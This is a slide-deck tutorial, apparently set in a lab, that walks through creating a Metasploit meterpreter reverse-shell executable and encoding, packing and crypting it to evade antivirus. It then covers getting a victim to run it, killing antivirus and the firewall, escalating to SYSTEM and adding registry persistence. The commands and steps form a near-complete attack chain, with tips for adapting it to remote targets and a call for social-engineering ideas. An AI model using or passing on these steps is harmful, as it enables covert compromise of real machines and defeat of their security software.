3. Testing Environment pt.1
All examples shown will be performed in a controlled network, I do not condone the
use of these methods in the wild.
Host Network
192.168.1.0/24
Host Computer
Virtualised Environment (Oracle VirtualBox)
WAN 192.168.56.0/24
LAN 10.0.2.0/24
Virtual Router (pfSense)
WAN 10.0.2.15
LAN 192.168.2.0/24
Attacker (Kali)
Client (Win7)
4. Testing Environment pt.2
VirtualBox Configuration
1.
2.
3.
4.
5.
Download pfSense ISO (http://www.pfsense.org)
Create new VM using wizard
Install 2 NIC’s
NIC 1 should be configured to use NAT
NIC 2 should be configured to use Internal Network
6. Metasploit pt.1
Payload Creation
• Using msfpayload –h we can see all the available options.
• Using –l will show all of the available payloads, for this example me will be
generating a meterpreter shell to connect back to the attacker due to its flexibility.
• Selecting the meterpreter reverse tcp payload
• Using msfpayload windows/meterpreter/reverse_tcp O will give
use the payload options which we will input in the next step
• X to create an executable
• > pay.exe – exports the payload to filename pay.exe
• We will now have the executable pay.exe on our desktop
Here we can choose how to output the payload, we can
export to C, Ruby for later compiling or we can export to
Java if we wanted to create an applet attack. For this example
however we will be exporting to an executable for an
infectious media attack
We have 2 configurable options for this payload:
1.
LHOST – this is the address of the attacking machine
(for this lab we will use a local address however you
can use an external address for a remote attack)
2.
LPORT – this is the port used to connect back to the
attacker, for this lab we will use port 4444 however if
you are behind a restrictive firewall you may want to
select a port that will be open e.g 443 (ssl) or 53 (dns).
Also if this is a remote attack you would have to port
forward the selected port
7.
8. Checking Our Work
• Uploading the file to Metascan will check our payload against 43
antivirus scanning engines
• Unfortunately the payload we created was detected 26 times, we now
have to work on lowering this detection rate
9. Metasploit pt.2
Payload Encoding
We use msfencode using the same command, however we now use
the switch “R” to output the file as RAW and use “|” to pipe the file
into msfencode
• the raw output of the prevous command is piped
into another encoder using “|”
• We use msfencode –e x86/countdown –c 5 –t exe –
o payenc.exe to encode the file again and then
output the resultant to payenc.exe
Note: this is by no means a comprehensive coverage of msfpayload or msfencode, I suggest
reading Metasploit: The Penetration Testers Guide for full usage of these tools.
Msfencode:
• -e – selects the encoder (in the example shikata_ga_nai is used)
• -c – sets the number of times the payload is encoded
• -t – sets the output file to RAW
Lastly we will pack our file to add an extra layer of obscurity using the
following command:
Upx -9 payenc.exe payencpacked.exe
10. Checking Our Work
•
•
Uploading the file shows the results are not good,
antivirus vendors are getting wise towards the
encoders we used.
We now need to utilise some other methods to
Obfuscate the payload further
11. Obfuscation pt.1
Over to you Windows
Nemesis Crypter
1. Main – select location of file
2. Options - set the encryption
algorithm to AES
3. Assembly Information – Set to random
4. Crypt file
12. Checking Our Work
Notice a Pattern Emerging
• Ok so that’s a good enough detection rate.
• Its interesting to note that all the free antivirus vendors failed to detect our payload (AVG
I'm looking at you) whilst Norton and Kaspersky still detected, thus highlighting the need
to PAY for a good antivirus.
13. Obfuscation pt.2
.net Shrink
•
No one method is fool
proof, however there
are hundreds of tools
to further obfuscate
your payload you just
need to experiment
DeepSea Obfuscatior
.net Reactor
•
•
Antivirus vendors will
eventually become wise to
all encoders and
obfuscators
I hope this highlights the
importance of having a
good antivirus (remember
to laugh at apple fan boys
when they say they are
immune to viruses)
14. Where are we now
We now have a payload that has a low detection rate…….what do we do
now?
Two things need to be accomplished:
1. We need a method for the payload to connect from the client
machine to the attacking machine (this is a client side attack
remember)
2. We need a way to get the victim to execute the payload (think social
engineering, I will look forward to hearing your ideas)
15. Metasploit pt.3
•
•
Remember that we programmed our payload to reverse connect to 192.168.2.11:4444
We now need to set metasploit to listen for connections on 192.168.2.11:4444
Start metasploit using
msfconsole
Starts listening for client
connections
16. Metasploit pt.3 cont.
Set LHOST – sets the
listen address which is
the ip of the attacker
machine
set LPORT – sets the
listen port
Exploit – starts the
listener
The attacking machine is
now ready to accept
incoming connections
17. • User on client machine
clicks malicious file
• notice that nothing
suspicious happens
• user assumes that it is
just a broken file
• little do they know……
Meanwhile the attacker
machine has accepted a
remote connection from
the client
A meterpreter session
is now open
18. if we issue a netstat –a
on the client machine to
list all remote
connections we see the
connection from
192.168.2.7 (the client)
to 192.168.2.11:4444
(the attacker)
19.
20. Meterpreter
Post-Exploitation
We have our meterpreter session to the client machine we now need to
ensure the client stays compromised:
1. Kill any antivirus (although our payload hasn't been detected, any future
modifications may reveal the payload to the antivirus).
2. Kill firewall
3. Migrate the meterpreter session to a secure process
4. Elevate our privileges
5. Make our meterpreter session persistent through reboots
21. Idletime - we don’t want to run these commands
when the user is present
Ps – shows the running processes on the client
machine
We now need to disable the antivirus , in this case the
client is running security essentials msseces.exe =
2356 so we issue kill 2356 (note: it is useful to
familiarise yourself with the processes other antivirus
packages use).
Currently meterpreter is running as process
“abc.exe” which is highly suspicious, using the
migrate command we will run meterpreter as
“explorer.exe” (note: when using meterpreter we
use the PID number rather than the process name
e.g. explorer.exe = 1424).
Using “getsystem“ and “getprivs” gives us the system
user account and all the associated privileges.
Using “shell” we drop down into the windows
command line and issue the command “netsh
advfirewall set allprofiles state off”. The windows
firewall is now off.
The system is now defenceless and we have
complete control.
I hope this slide has demonstrated the
multidisciplinary nature of hacking by using
both the Linux and windows command line.
I would recommend reading the following
texts to further familiarise yourselves with
both command lines.
22. Meterpreter
Maintaining Access
1.
Use the “shell” command to get a windows command prompt
2.
We are now going to add a registry key that executes the payload at every boot by using the command reg add “path to registry key”
3.
/v names the registry key
4.
/t specifies the key type
5.
/d defines the path to our executable